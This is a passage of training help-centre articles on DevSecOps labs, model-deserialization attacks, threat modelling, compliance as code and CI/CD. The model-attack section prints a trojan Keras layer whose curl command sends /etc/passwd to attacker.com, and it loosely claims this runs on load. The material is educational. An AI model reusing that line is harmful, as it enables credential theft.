- Use a plain-text editor (e.g., Notepad, VS Code) to strip invisible formatting before pasting into the answer field.
- Keep a cheat sheet of common AAC quirks (case, whitespace, token format) for quick reference.
- Test locally: run the command or script in your own terminal first, then adapt the exact output to the AAC format.
- Bookmark the "Answer" button location on each challenge page so you can quickly verify without scrolling.

Conclusion

Understanding the strict validation rules of the Automatic Answer Checker and the current inability to reset lab progress empowers you to troubleshoot efficiently and keep your DevSecOps learning journey on track. By following the verification steps, adhering to exact formatting, and leveraging the work-arounds outlined above, you'll minimize unnecessary roadblocks and focus on mastering the core security concepts. If you still encounter issues after applying these guidelines, don't hesitate to reach out to the Technical Support team with detailed information—our goal is to help you succeed.
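If you want to see exactly why a submission differs from a reference answer, a small local helper can surface hidden case, whitespace, and length mismatches before you resubmit. This is not part of the lab platform, just an illustrative sketch you can run on your own machine:

```python
# Local helper (not part of the lab platform) that reports why an exact
# string match against the AAC reference might fail: hidden whitespace,
# case differences, or length mismatches such as a missing tag.
def diff_answer(submission: str, reference: str) -> list[str]:
    issues = []
    if submission == reference:
        return issues  # exact match: the AAC would accept this
    if submission.strip() != submission:
        issues.append("submission has leading/trailing whitespace")
    if submission.strip().lower() == reference.strip().lower():
        issues.append("differs only in case and/or surrounding whitespace")
    if len(submission) != len(reference):
        issues.append(f"length differs: {len(submission)} vs {len(reference)}")
    # Point at the first character that actually differs
    for i, (a, b) in enumerate(zip(submission, reference)):
        if a != b:
            issues.append(f"first mismatch at index {i}: {a!r} vs {b!r}")
            break
    return issues

print(diff_answer("admin ", "admin"))
print(diff_answer("docker run -d nginx", "docker run -d nginx:latest"))
```

Pasting your answer and the reference into this function makes cosmetic differences visible immediately, which is usually all that separates a "wrong" answer from an accepted one.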

Last updated on Feb 09, 2026

Advanced Lab Topics: Model Attacks & How to Identify Front‑End vs. Back‑End Code in a Repository

In this article we dive deep into two frequent pain points that learners encounter while working through DevSecOps labs:

1. Understanding why a trojan-injected neural-network model looks different from a classic pickle-based model
2. Determining whether a given source-code repository contains front-end, back-end, or full-stack components

Both topics are essential for mastering secure model deployment and for communicating effectively with DevOps teams. Let's explore the concepts, practical steps, and common questions you'll face on the job.

1. Trojanized Models – What Really Changes?

1.1 The Core Attack Vector Remains the Same

Regardless of the model's format, the underlying vulnerability is pickle-based code execution. An attacker can embed malicious Python objects that execute arbitrary commands when the model is unpickled (or otherwise deserialized).

| Aspect | Classic Pickle Model | Neural-Network (.h5) Model |
|--------|----------------------|----------------------------|
| File type | .pkl (binary pickle) | .h5 (HDF5 container) |
| Framework | Pure Python / scikit-learn | TensorFlow / Keras |
| Storage format | Serialized Python objects | HDF5 dataset with layers, weights, and optional custom objects |
| Attack technique | Inject malicious __reduce__ payload into pickle | Embed malicious custom layer or callback that is executed during model loading (load_model) |
| Security risk | Same – arbitrary code execution on deserialization | Same – code runs when the model is loaded with tf.keras.models.load_model() |

Bottom line: the type of model (pickle vs. neural network) changes only the file format and loading API. The risk—code execution during deserialization—remains identical.
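The pickle-side attack technique named above (a malicious `__reduce__` payload) can be demonstrated harmlessly. In this sketch the payload calls a benign function instead of `os.system`, but the mechanism is identical: pickle invokes the callable during `loads`, before any "model" code is ever used.

```python
import pickle

class TrojanPayload:
    def __reduce__(self):
        # A real attacker would return (os.system, ("malicious command",));
        # here we return a harmless callable to show that arbitrary code
        # runs at deserialization time.
        return (str.upper, ("attacker code ran",))

blob = pickle.dumps(TrojanPayload())
result = pickle.loads(blob)  # executes str.upper(...) during loading
print(result)  # → ATTACKER CODE RAN
```

Note that the loaded object is not a `TrojanPayload` at all but whatever the payload's callable returned, which is exactly why unpickling untrusted model files is unsafe.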
1.2 Why the .h5 Example Matters

In production environments, many teams store Keras/TensorFlow models as .h5 files because HDF5 is compact, version-agnostic, and easy to serve with model-hosting platforms. Demonstrating the attack on a .h5 model shows learners how the same exploit can slip through a "real-world" pipeline that looks perfectly legitimate.

Practical Example

# Malicious custom layer that runs a shell command
class EvilLayer(tf.keras.layers.Layer):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)

    def call(self, inputs):
        import os
        os.system('curl http://attacker.com/steal?data=$(cat /etc/passwd)')
        return inputs

# Save the compromised model
model = tf.keras.Sequential([tf.keras.layers.Dense(10), EvilLayer()])
model.save('compromised_model.h5')

When a downstream service runs tf.keras.models.load_model('compromised_model.h5'), the EvilLayer code executes, delivering the same impact as a malicious pickle.

2. Determining Front-End vs. Back-End Code in a Repository

2.1 Start with Language-Based Heuristics

| Language / Framework | Typical Layer | Typical File Extensions |
|----------------------|---------------|-------------------------|
| Python, Java, Go, .NET, Ruby on Rails | Back-end (API, services, DB logic) | .py, .java, .go, .cs, .rb |
| JavaScript (TypeScript, CoffeeScript) | Front-end UI code | .js, .ts, .coffee |
| Angular, Vue.js, React | Front-end SPA frameworks | .html, .vue, .jsx, .tsx |
| Node.js | Can be both (API + server-side rendering) | .js, .ts |
| HTML / CSS / SCSS | Pure front-end assets | .html, .css, .scss |

If you spot a mix of the above, the repository is likely full-stack.

2.2 Examine Project Structure

1. Look for conventional directories
   - src/main/java or app/ → back-end
   - src/frontend, public/, static/, client/ → front-end
2. Check build / dependency files
   - package.json, webpack.config.js, vite.config.ts → front-end tooling
   - pom.xml, build.gradle, requirements.txt → back-end or shared services
3. Identify Dockerfiles / CI scripts
   - A Dockerfile that installs nginx and copies dist/ usually serves a front-end bundle.
   - A Dockerfile that runs gunicorn, java -jar, or dotnet run indicates back-end services.

2.3 Microservices vs. Monoliths

| Architecture | Likely Code Mix |
|--------------|-----------------|
| Microservices (each repo = one service) | Usually back-end only (API, DB access) |
| Full-stack application (single repo) | Contains both front-end UI and back-end API layers |

If you're dealing with a microservice, ask: "Does this service expose HTTP endpoints only, or does it also bundle a UI?" The answer often lies in the presence of static asset folders (/static, /public) or a frontend/ sub-module.

2.4 Collaboration Is Key

Even with the best heuristics, you may need to:
- Ask the repository owner for a quick overview.
- Review the README – many teams document the stack explicitly.
- Pair-program with a teammate to walk through the folder layout.

3. Tips & Best Practices

- Automate detection: write a simple script that scans for language-specific file extensions and reports a front-end/back-end ratio.
- Use static analysis tools (e.g., cloc, SonarQube) to get a language breakdown.
- Validate model sources: never load a model from an untrusted location without sandboxing or integrity checks (hash verification, signed artifacts).
- Document your findings: add a CODEBASE.md file describing the layers present; this helps future security reviews.

4. Common Questions

| Question | Answer |
|----------|--------|
| Is the neural-network attack more dangerous than the pickle attack? | No. Both allow arbitrary code execution; the difference is only the file format and loading library. |
| What if a repository contains only JavaScript files? | It could be a front-end SPA, a Node.js back-end, or a full-stack project. Look at the package.json scripts (start, build) and any server-side frameworks (Express, NestJS). |
| Can I rely on file extensions alone? | Not entirely. Some projects use compiled assets (.js generated from TypeScript) or embed back-end code in unconventional files. Combine extension checks with directory conventions and build configs. |
| How do I safely load a potentially compromised model? | Use a restricted execution environment (Docker container with limited privileges), verify a digital signature, or load the model in a sandboxed interpreter that disables os.system-like calls. |

Takeaway

Understanding the underlying security principle (code execution on deserialization) lets you spot model-related threats regardless of file type. Simultaneously, mastering language-based heuristics and project-structure clues equips you to quickly identify the front-end/back-end composition of any repository—an essential skill when collaborating with DevOps and development teams. Use the guidelines above to audit labs confidently, communicate findings clearly, and keep your pipelines secure.
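The "automate detection" tip can be sketched as a short script. The extension-to-layer mapping below is an assumption drawn from the heuristics table, not an exhaustive classifier, so treat the verdict as a starting point to combine with directory conventions and build configs:

```python
from collections import Counter
from pathlib import Path

# Assumed mapping based on the language heuristics table; adjust per team.
FRONTEND = {".html", ".css", ".scss", ".vue", ".jsx", ".tsx"}
BACKEND = {".py", ".java", ".go", ".cs", ".rb"}
AMBIGUOUS = {".js", ".ts"}  # Node.js code can live in either layer

def classify_repo(root: str) -> dict:
    """Count files by extension and guess the repository's layer mix."""
    counts = Counter(p.suffix for p in Path(root).rglob("*") if p.is_file())
    fe = sum(counts[e] for e in FRONTEND)
    be = sum(counts[e] for e in BACKEND)
    both = sum(counts[e] for e in AMBIGUOUS)
    if fe and be:
        verdict = "full-stack"
    elif fe:
        verdict = "front-end"
    elif be:
        verdict = "back-end"
    else:
        verdict = "unclear (check package.json scripts and Dockerfiles)"
    return {"frontend": fe, "backend": be, "ambiguous": both, "verdict": verdict}
```

Running `classify_repo(".")` in a cloned repository gives a quick front-end/back-end ratio; a high "ambiguous" count means you need the package.json and Dockerfile checks described above.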

Last updated on Jan 07, 2026

Security Modeling and Compliance as Code: Tools, Scope, and Metadata

Introduction

In today's fast-moving DevSecOps landscape, threat modeling and Compliance as Code are essential practices that help teams anticipate risks, meet regulatory obligations, and embed security directly into the software delivery pipeline. This article compares two popular open-source threat-modeling tools—Threagile and OWASP PyTM—explores how threat modeling applies far beyond software, and explains how compliance policies are expressed as code with rich metadata. By the end of the guide you'll know which tool fits your team, how to broaden threat modeling to any system, and where to find ready-made compliance profiles.

1. Choosing a Threat-Modeling Tool: Threagile vs. OWASP PyTM

Both tools are free, community-driven, and support the same core goal: turn abstract threats into concrete, actionable items. Their differences lie in user experience, automation, and collaboration features.

1.1 OWASP PyTM – Code-Centric & Automation Friendly

| Feature | Details |
|---------|---------|
| Approach | Write threat-model definitions in Python scripts. |
| Best for | Teams that treat threat modeling like any other source-code artifact—versioned, linted, and CI-integrated. |
| Automation | Generates STRIDE-based threat tables automatically; can be invoked from pipelines to keep models up to date. |
| Extensibility | Leverages the full Python ecosystem (e.g., Jinja templates, custom analysis functions). |
| Learning curve | Requires basic programming knowledge; ideal for developers and security engineers comfortable with code. |
| Key resources | OWASP PyTM documentation |

Practical example – CI integration: add a step in your GitHub Actions workflow that runs pytm on every pull request, fails the build if new high-severity threats appear, and posts a markdown report as a PR comment.
1.2 Threagile – Visual, Rule-Based, and Team-Oriented

| Feature | Details |
|---------|---------|
| Approach | Define models in a YAML file; a web UI renders diagrams and lets non-technical stakeholders explore them. |
| Best for | Mixed teams (developers, product owners, auditors) who need a server-based repository and visual collaboration. |
| Mitigation suggestions | Built-in rule engine proposes countermeasures based on the identified threats. |
| Access control | Role-based permissions for editing, reviewing, and exporting models. |
| Learning curve | Low-code; no programming required, just a structured YAML file and optional UI. |
| Key resources | Threagile GitHub repository |

Practical example – Stakeholder review: upload a YAML model to the Threagile server, generate a live diagram, and share a read-only link with compliance auditors who can comment directly on the diagram without touching code.

1.3 Decision Checklist

| Question | Choose PyTM if… | Choose Threagile if… |
|----------|-----------------|----------------------|
| Do you already manage security artifacts as code? | ✅ | ❌ |
| Is your team comfortable writing Python? | ✅ | ❌ |
| Do you need a visual UI for non-programmers? | ❌ | ✅ |
| Must you run threat modeling inside CI/CD pipelines? | ✅ | ✅ (via CLI) |
| Do you want automated mitigation recommendations? | ❌ | ✅ |
| Do you need role-based access and server-side storage? | ❌ | ✅ |

2. Threat Modeling: Not Just for Software

2.1 The universal nature of threat modeling

Threat modeling is a systematic way to identify, prioritize, and mitigate risks. While it originated in software security, the methodology is equally valuable for any asset that can be attacked or misused.
| Domain | Example Threats | Typical STRIDE mapping |
|--------|-----------------|------------------------|
| Physical infrastructure (e.g., a data center) | Unauthorized entry, sabotage, environmental damage | Spoofing (badge forgery), Tampering (hardware tampering), Denial of Service (power cut) |
| Automotive (connected car) | Remote code execution, GPS spoofing | Elevation of Privilege, Spoofing |
| Smart home (IoT hub) | Credential theft, firmware downgrade | Repudiation, Information Disclosure |
| Election systems (voting machines) | Vote manipulation, audit trail deletion | Tampering, Repudiation |
| Business processes (procurement workflow) | Fraudulent approvals, data leakage | Spoofing, Information Disclosure |

2.2 Adapting STRIDE to non-software contexts

1. Identify assets – physical devices, data stores, people, or processes.
2. Define entry points – doors, APIs, network ports, or procedural hand-offs.
3. Apply STRIDE – ask the same six questions, but translate them into the domain language (e.g., "Can an attacker spoof a badge?").
4. Prioritize – use impact and likelihood scores, just like in software.
5. Mitigate – assign controls (locks, encryption, policies) and track them in the same model.

Scenario: a hospital wants to protect its radiology imaging system. By applying STRIDE, the team discovers a Tampering risk where an insider could replace image files. The mitigation is a combination of digital signatures (software) and tamper-evident seals (physical).

3. Compliance as Code: Embedding Requirements with Metadata

3.1 What is "Compliance as Code"?

Compliance as Code treats regulatory controls (PCI-DSS, HIPAA, GDPR, etc.) as executable, version-controlled artifacts. The code contains:
- Metadata – unique identifiers, control descriptions, severity, and mapping to standards.
- Tests – InSpec, OPA, or custom scripts that validate the environment against the control.
- Remediation guidance – inline comments or links to documentation.
3.2 Why metadata matters

Metadata makes compliance discoverable, searchable, and automatable:

| Metadata field | Purpose |
|----------------|---------|
| control_id | Unique reference (e.g., PCI-DSS-6.4) |
| description | Human-readable statement of the requirement |
| severity | Risk rating (low/medium/high) |
| framework | Source standard (PCI, NIST, ISO) |
| tags | Contextual labels (cloud, network, data-at-rest) |
| remediation | Suggested fix or reference link |

When a compliance scanner runs, it can filter by severity to focus on high-risk controls, or group controls by tags to generate a cloud-specific report.

3.3 Example: PCI-DSS control as InSpec code

# controls/pci_dss_6_4.rb
control 'PCI-DSS-6.4' do
  title 'Secure development processes'
  desc 'All changes to system components must be tracked and reviewed.'
  impact 0.7
  tag severity: 'high'
  tag framework: 'PCI-DSS'
  tag cloud: true

  describe file('/etc/gitconfig') do
    its('content') { should match /commit.gpgsign = true/ }
  end
end

The tag statements are the metadata that make the control searchable and sortable.

3.4 Ready-made compliance profiles

Google Cloud provides a curated PCI-DSS profile built with InSpec:
- GitHub: https://github.com/GoogleCloudPlatform/inspec-gcp-pci-profile

You can fork the repository, add organization-specific tags, and run it automatically in your CI pipeline to enforce compliance continuously.

4. Tips & Best Practices

| Area | Recommendation |
|------|----------------|
| Tool selection | Start with a small pilot model in both PyTM and Threagile; compare developer velocity vs. stakeholder engagement. |
| Model granularity | Keep the model at a manageable scope (e.g., per microservice or per critical asset) to avoid analysis paralysis. |
| Collaboration | Use version control for YAML/Python files; enable pull-request reviews to involve security, product, and compliance teams. |
| Automation | Schedule nightly runs of compliance scans; fail builds on new high-severity threats or compliance violations. |
| Documentation | Store mitigation rationale alongside the threat or control metadata to preserve institutional knowledge. |
| Continuous improvement | Review and prune outdated controls every quarter; incorporate lessons learned from incidents. |

5. Common Questions

Q1: Can I use both Threagile and PyTM together?
Yes. Many organizations maintain a code-first model in PyTM for CI/CD integration while mirroring the same data in Threagile for visual stakeholder reviews. Export scripts can convert PyTM output to Threagile's YAML format.

Q2: Is threat modeling worth the effort for a small internal tool?
Even a lightweight model helps uncover hidden risks early. A simple STRIDE worksheet can be completed in an hour and often reveals misconfigurations that would otherwise be missed.

Q3: How do I keep compliance metadata up to date when standards change?
Treat compliance profiles as living code: version them in Git, subscribe to the upstream repository's releases (e.g., the InSpec PCI profile), and schedule a quarterly sync task to merge upstream changes.

Q4: Do I need a separate compliance server?
Not necessarily. InSpec can run locally, in CI pipelines, or on a dedicated compliance node. For large enterprises, a centralized compliance dashboard (e.g., Chef Automate, Terraform Cloud) provides aggregated reporting.

Conclusion

Effective security modeling and Compliance as Code turn abstract requirements into concrete, testable artifacts that evolve with your applications and infrastructure. Choose Threagile for visual, collaborative environments and OWASP PyTM for code-centric automation. Remember that threat modeling extends to any asset—buildings, vehicles, voting systems—by applying the same STRIDE mindset.
Finally, embed compliance controls as code with rich metadata to enable searchable, automated, and continuously auditable security governance. By integrating these practices into your DevSecOps pipeline, you’ll achieve faster risk mitigation, clearer accountability, and smoother audit readiness.
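As a complement to the InSpec example, the metadata-driven filtering described in section 3.2 can be sketched in a few lines. This is an illustrative model, not an InSpec feature; the sample control IDs beyond PCI-DSS-6.4 are hypothetical:

```python
from dataclasses import dataclass, field

# Illustrative sketch of how control metadata (control_id, severity,
# framework, tags) enables the filtering a compliance scanner performs.
@dataclass
class Control:
    control_id: str
    description: str
    severity: str            # low / medium / high
    framework: str
    tags: set = field(default_factory=set)

CONTROLS = [
    Control("PCI-DSS-6.4", "Secure development processes", "high", "PCI-DSS", {"cloud"}),
    Control("PCI-DSS-8.2", "Strong authentication", "medium", "PCI-DSS", {"network"}),
    Control("NIST-AC-2", "Account management", "high", "NIST", {"cloud", "identity"}),
]

def filter_controls(controls, severity=None, tag=None):
    """Select controls by severity and/or tag, as a scanner report might."""
    return [
        c for c in controls
        if (severity is None or c.severity == severity)
        and (tag is None or tag in c.tags)
    ]

high_cloud = filter_controls(CONTROLS, severity="high", tag="cloud")
print([c.control_id for c in high_cloud])  # → ['PCI-DSS-6.4', 'NIST-AC-2']
```

Because the metadata is structured, the same control set can power a high-severity report, a cloud-only report, or a per-framework audit view without duplicating the controls themselves.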

Last updated on Jan 07, 2026

Technical Support: Response Times, Device Configuration, and GitLab Templates for DevSecOps Learners

Welcome to the Practical DevSecOps support hub! Whether you're setting up a lab environment, waiting for a response from our support team, or looking for a starter GitLab CI/CD template, this guide consolidates the most frequently needed information into one easy-to-navigate article. Follow the steps below to avoid common pitfalls, keep your learning momentum, and get the most out of your DevSecOps training.

1. Configuring Your Laptop or Device for Lab Access

Why device configuration matters

Company-issued laptops often come with corporate firewalls, proxy settings, or endpoint-security agents that can unintentionally block traffic to the Practical DevSecOps lab platform. When the lab cannot be reached, exercises stall and valuable learning time is lost.

Recommended approach: use a personal device

| Benefit | Reason |
|---------|--------|
| Fewer firewall restrictions | Personal machines typically have fewer outbound rules, reducing the chance of blocked ports. |
| Full control over software | You can install required tools (Docker, VS Code, etc.) without needing admin approval. |
| Simpler troubleshooting | Issues are easier to isolate when you control the environment. |

If you must use a company laptop

1. Check outbound connectivity
   - Verify that ports 80 (HTTP), 443 (HTTPS), and any custom ports listed in your lab instructions are open.
   - Use telnet <lab-url> 443 or curl -I https://<lab-url> to confirm reachability.
2. Whitelist the lab domain
   - Request that your IT team add *.practical-devsecops.com to the firewall's allowed list.
   - Provide the exact URLs from the lab guide (e.g., lab.practical-devsecops.com, api.practical-devsecops.com).
3. Disable conflicting VPNs or proxy agents
   - Some corporate VPNs route all traffic through a gateway that blocks external lab traffic.
   - Temporarily disconnect from the VPN while working on lab exercises, then reconnect for regular work.
4. Run a quick connectivity test

# Test HTTPS access to the lab platform
curl -I https://lab.practical-devsecops.com
# Expected output: HTTP/2 200 OK

If you receive a timeout or a 403/502 error, revisit the firewall whitelist step.

Scenario: Anna, a new student, kept receiving "Unable to connect to the lab" errors on her corporate laptop. After adding lab.practical-devsecops.com to the corporate firewall whitelist and disabling her VPN, the issue resolved within minutes.

2. How Quickly Can You Expect a Response?

Standard response timeline

- Typical turnaround: 3 business days from the time you send an email to trainings@practical-devsecops.com.
- What counts as a business day? Monday through Friday, excluding public holidays observed by our support team.

Tips to accelerate assistance

| Action | Impact |
|--------|--------|
| Provide a clear subject line (e.g., "Lab #3 Docker container fails to start") | Helps the support queue prioritize your ticket. |
| Include environment details – OS version, laptop model, and any error messages | Reduces back-and-forth clarification. |
| Attach screenshots or logs | Visual context speeds up diagnosis. |
| Reference the specific lab or module | Allows the support team to locate the relevant documentation instantly. |

Example email:

Subject: Lab 5 – GitLab Runner cannot pull Docker image

Hi Support,

I'm using Windows 10 (v22H2) on a personal laptop. When I run `gitlab-runner exec docker` I receive:
ERROR: Failed to pull image "python:3.9-slim".
I've verified that port 443 is open and can access https://gitlab.com. Could you advise?

Thanks,
Mark

Following these guidelines often results in a response within 24–48 hours, even though the official SLA is three business days.

3. Getting Started with a Basic GitLab CI/CD Template

A solid CI/CD pipeline is the backbone of any DevSecOps workflow.
GitLab provides a library of ready-made templates that you can import directly into your project.

Where to find the official templates

- URL: https://docs.gitlab.com/ee/development/cicd/templates.html
- The page lists templates for languages (Python, Node.js, Java), security scanning (SAST, DAST), and deployment strategies.

Minimal "Hello World" pipeline example

# .gitlab-ci.yml
stages:
  - build
  - test
  - deploy

build_job:
  stage: build
  image: maven:3.8.5-jdk-11
  script:
    - mvn compile

test_job:
  stage: test
  image: maven:3.8.5-jdk-11
  script:
    - mvn test

deploy_job:
  stage: deploy
  image: alpine:latest
  script:
    - echo "Deploy step – replace with your own commands"

How to use it

1. Create a file named .gitlab-ci.yml at the root of your repository.
2. Copy the snippet above into the file.
3. Commit and push to GitLab; the pipeline will trigger automatically.

You can replace the image and script sections with the language or toolset relevant to your lab exercise.

Extending the template for security scanning

Add a SAST job using GitLab's built-in scanner:

sast:
  stage: test
  image: docker:stable
  services:
    - docker:dind
  script:
    - echo "Running SAST..."

This addition demonstrates how security testing integrates directly into the CI pipeline—core to DevSecOps practice.

4. Common Questions & Quick Tips

FAQ

- Q: My lab environment still blocks connections after whitelisting the domain.
  A: Verify that your local antivirus or endpoint protection isn't intercepting HTTPS traffic. Temporarily disable it for troubleshooting.
- Q: Can I expect a faster reply on weekends?
  A: Support operates Monday–Friday. Weekend queries are queued and addressed on the next business day.
- Q: Do I need to modify the GitLab template for every lab?
  A: Most labs start with the basic template; only replace the script commands with those specified in the lab instructions.

Pro Tips

- Bookmark the GitLab template page for quick reference during labs.
- Create a "support log" in a shared note (e.g., OneNote) to track questions, timestamps, and resolutions—helpful for future cohorts.
- Test connectivity early: run a simple curl command to the lab URL before diving into complex exercises.

5. Next Steps

1. Configure your device following the checklist in Section 1.
2. Request a real agent, providing detailed information as outlined in Section 2.
3. Clone the starter GitLab repository and apply the basic .gitlab-ci.yml template from Section 3.

By preparing your environment ahead of time and using the communication best practices described here, you'll spend less time troubleshooting and more time mastering DevSecOps concepts. Happy learning!
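If curl or telnet isn't available on your machine, the connectivity test from Section 1 can also be done with a few lines of Python. This is an illustrative local helper, not a platform tool; substitute the hostnames from your own lab guide:

```python
import socket

def port_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout.

    A False result on port 443 usually points at a firewall, proxy, or
    VPN blocking outbound traffic - the same causes covered in Section 1.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Example (requires network access; host taken from the lab guide):
# print(port_reachable("lab.practical-devsecops.com", 443))
```

Running the check for ports 80 and 443 before starting a lab session tells you immediately whether the problem is on your network rather than the lab platform.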

Last updated on Feb 09, 2026

Lab Access & Technical Support: Common Issues and How to Resolve Them

Ensuring a smooth learning experience is essential for anyone enrolled in a DevSecOps certification program. Whether you're waiting for a lab environment to spin up, your course isn't showing up in the portal, or you're encountering email delivery problems, this guide walks you through the most frequent technical hurdles and provides step-by-step solutions. By following the troubleshooting tips below, you'll get back on track quickly and keep your study schedule on target.

Table of Contents

1. Why Lab Provisioning Takes Time (and What to Expect)
2. My Course Isn't Visible – What to Do Next
3. Email Delivery Failures When Contacting Support
4. Quick Tips & Frequently Asked Questions

Why Lab Provisioning Takes Time

The reality of dynamic lab environments

Each lab machine is provisioned on demand in a cloud-based sandbox. Because resources are allocated per student, the spin-up time can vary based on:
- Underlying VM image size – larger images (e.g., full-stack Kubernetes clusters) need more initialization time.

Typical wait times
- Standard labs: ≈ 1–2 minutes from the moment you click "Start Lab".
- Complex labs (e.g., multi-node pipelines): ≈ 4–7 minutes.

If you've waited at least 3 minutes and still see no access, proceed with the steps below.

Step-by-step checklist

1. Refresh the lab dashboard – use a hard refresh (Ctrl + F5 or Cmd + Shift + R).
2. Verify your internet connection – a stable connection prevents timeout errors.
3. Check the "Understanding Lab Setup" exercise – the introductory module contains a short video and a troubleshooting checklist that mirrors this scenario.
4. Contact support – if the lab remains unavailable after 5 minutes, request a real agent via the Chat with support feature.

Example: Jane, a student in the "Secure CI/CD Pipeline" course, waited 4 minutes, refreshed the dashboard, and then saw the lab appear. She later noted that the "Understanding Lab Setup" video had reminded her to allow a 3-minute buffer.

My Course Isn't Visible – What to Do Next

Why a course might not appear immediately

When you enroll, a build job is triggered in the background to provision all required resources (labs, assessments, and content modules). This process typically takes 20–30 minutes. During this window, the course may not be listed on your dashboard.

How to confirm the build status

1. Check the "My Enrollments" page – a small spinner icon next to the course name indicates an ongoing build.
2. Wait the recommended 20–30 minutes – most builds complete within this timeframe.
3. Refresh the page – after the wait, a full refresh should display the course.

If the course still doesn't show up
- Reach out to support – use the in-portal chat or email (see the email section below). Provide:
  - Your full name and enrollment ID
  - The exact course title
  - The timestamp of enrollment
  - A screenshot of the "My Enrollments" page

Scenario: Carlos enrolled in "Infrastructure as Code Security" at 10:15 AM. By 10:40 AM his dashboard still displayed a loading icon. After contacting support with the details above, the team manually triggered a rebuild, and the course appeared within 5 minutes.

Email Delivery Failures When Contacting Support

Common cause: Outlook or corporate email filters

If you receive an error stating that Outlook blocked the delivery of your message to trainings@practical-devsecops.com, it's usually a policy rule or spam filter on your organization's mail server.

Alternative contact methods

1. Use the secondary address – send your query to registrations@practical-devsecops.com. This mailbox bypasses most outbound filters.
2. Check your "Sent" folder – confirm that the email left your outbox.
3. Ask your IT administrator – request that they whitelist the domain practical-devsecops.com.
4. Use the portal's Chat with support feature – this lets our team pull up details of the lab you're having trouble with.

Sample email template

Subject: Lab Access Issue – [Your Full Name] – Enrollment #12345

Hi Practical DevSecOps Support,

I'm experiencing trouble accessing my lab for the "Secure Container Scanning" course. I have waited the recommended 3 minutes, refreshed the dashboard, and still see no lab. My enrollment ID is 12345. Could you please investigate and let me know the next steps?

Thank you,
[Your Name]
[Company / Organization]

Quick Tips & Frequently Asked Questions

| Question | Quick Answer |
|----------|--------------|
| How long should I wait for a lab to appear? | Minimum 1 minute; up to 5 minutes for complex labs. |
| My course still isn't listed after 30 minutes. What now? | Request help from a real agent, providing your enrollment details. |
| Outlook blocks my support email – any work-around? | Use registrations@practical-devsecops.com, or use the Chat with support feature and ask for a real agent. |
| Can I check the provisioning status? | Yes – look for the spinner icon on the "My Enrollments" page. |
| Do I need to restart the lab if it fails to load? | No – first refresh and wait the full buffer time; only restart after support advises. |

Pro Tips for a Smooth Experience

- Bookmark the "Understanding Lab Setup" exercise – it contains the most up-to-date provisioning timelines.
- Enable browser notifications – the portal can alert you when a lab is ready.
- Add our support domains to your safe-sender list – prevents future Outlook blocks.
- Keep a copy of your enrollment confirmation email – it includes the enrollment ID needed for faster support.

By understanding the typical provisioning timelines, knowing where to look for build status, and using the correct communication channels, you can resolve most lab access and technical support issues without delay.
If you ever find yourself stuck, remember the checklist above and reach out—our team is ready to help you stay on track with your DevSecOps certification journey.

Last updated on Mar 13, 2026

CI/CD Pipeline Stages, Key Differences, and DevSecOps Scan Best‑Practices

CI/CD Pipeline Stages, Key Differences, and DevSecOps Scan Best‑Practices A well‑designed CI/CD pipeline turns raw source code into a reliable, production‑ready application—fast and securely. This article walks you through each pipeline stage, clarifies the often‑confused release, integration, and deploy phases, and shares a practical rule of thumb for security scanning in a DevSecOps environment. Table of Contents 1. The End‑to‑End CI/CD Workflow 2. Stage‑by‑Stage Breakdown with Real‑World Examples - Plan - Build - Test - Release - Integration - Deploy 3. Release vs. Integration vs. Deploy: What Sets Them Apart? 4. DevSecOps Scan Duration Guideline (≤ 10 minutes) 5. Tips & Common Questions The End‑to‑End CI/CD Workflow CI (Continuous Integration) and CD (Continuous Delivery/Deployment) are not single commands; they are a sequence of automated stages that move code from a developer’s IDE to the hands of end users. Each stage adds value, catches defects early, and prepares the artifact for the next step. Key benefit: By automating these stages, teams achieve faster feedback loops, higher release frequency, and consistent security checks. Stage‑by‑Stage Breakdown with Real‑World Examples 1. Plan - Purpose: Capture what will be built and why it matters. - Typical activities: - Create user stories or feature tickets (e.g., JIRA, Azure Boards). - Define acceptance criteria and scope. - Estimate effort and identify dependencies. - Example: A product manager opens a ticket “Add multi‑currency checkout.” The story includes acceptance criteria such as “Support USD, EUR, GBP; display correct conversion rates; reject unsupported currencies.” 2. Build - Purpose: Transform source code into a runnable artifact. - Typical activities: - Resolve dependencies (npm, Maven, pip). - Compile source (e.g., javac, dotnet build). - Package the output (Docker image, JAR, WAR, zip). - Example: A Node.js microservice runs npm ci && npm run build && docker build -t myapp:1.2.0 . 
The resulting Docker image is stored in a container registry. 3. Test - Purpose: Verify functional, performance, and security quality before anything reaches users. - Typical activities: - Unit tests (JUnit, pytest). - Integration tests (API contract checks). - Static code analysis (SonarQube, ESLint). - Security scans (OWASP Dependency‑Check, Snyk). - Example: The pipeline executes npm test (unit), then runs a Postman collection against a temporary test environment, and finally triggers Snyk to scan for vulnerable npm packages. 4. Release - Purpose: Prepare a stable, versioned package for distribution. - Typical activities: - Tag the source repository (e.g., git tag v1.2.0). - Generate release notes (auto‑extracted from commit messages). - Create a signed artifact (e.g., PGP‑signed JAR). - Optionally run a final regression or user‑acceptance test. - Example: After all tests pass, GitLab creates a release object with a changelog, uploads the Docker image to the production registry, and marks the version as “candidate for production.” 5. Integration - Purpose: Combine code from multiple developers or services and validate that they work together. - Typical activities: - Merge feature branches into a develop or main branch. - Run integration test suites that span multiple services (e.g., contract testing, end‑to‑end UI flows). - Resolve merge conflicts early. - Example: Feature branch feature/payment-gateway is merged into main. A pipeline triggers an integration test that spins up the payment service, order service, and database to verify the complete checkout flow. 6. Deploy - Purpose: Deliver the release artifact to a target environment (staging, canary, or production). - Typical activities: - Execute infrastructure‑as‑code (Terraform, CloudFormation). - Run deployment scripts (Helm, Argo CD, Azure DevOps release). - Perform post‑deployment tasks: DB migrations, feature‑flag toggles, health‑checks. 
